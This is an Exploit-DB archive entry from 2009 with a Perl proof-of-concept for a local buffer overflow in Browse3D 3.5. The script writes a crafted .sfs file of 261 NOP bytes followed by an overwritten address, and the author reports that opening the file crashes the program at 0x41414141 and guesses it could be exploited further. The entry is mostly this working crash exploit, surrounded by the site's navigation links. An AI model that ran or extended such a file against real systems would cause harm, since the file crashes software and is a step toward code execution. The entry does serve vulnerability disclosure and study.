Browse3D 3.5 - '.sfs' Local Buffer Overflow (PoC)

EDB-ID:

7721

CVE:


EDB Verified:

Author:

Houssamix

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2009-01-11

Vulnerable App: 
#!/usr/bin/perl -w

# -- Viva Gazza -- Viva Palestine --

# Browse3D v3.5 (.sfs) File Local Buffer overflow PoC
# http://www.browse3d.com/downloads/Browse3Dsetup.exe

# Author : Houssamix

# create file exploit > open it > 
# Error : Access violation at 0x41414141 ( tried to read from 0x41414141 ), program terminated.

# we can't run this program under the debugger !!! any way i think it's can be exploited . good luck !

print "===================================================================== \n";
print "Author : Houssamix 						    \n";
print "===================================================================== \n";
print "Browse3D v3.5 Local Buffer overflow PoC				  \n";
print "===================================================================== \n";

my $adresse = "AAAA" ; 
my $nop = "\x90" x 261;

my $file = "Houssamix.sfs";
$exploit = $nop.$adresse;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created open it  with Browse3D v 3.5\n";

# milw0rm.com [2009-01-11]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services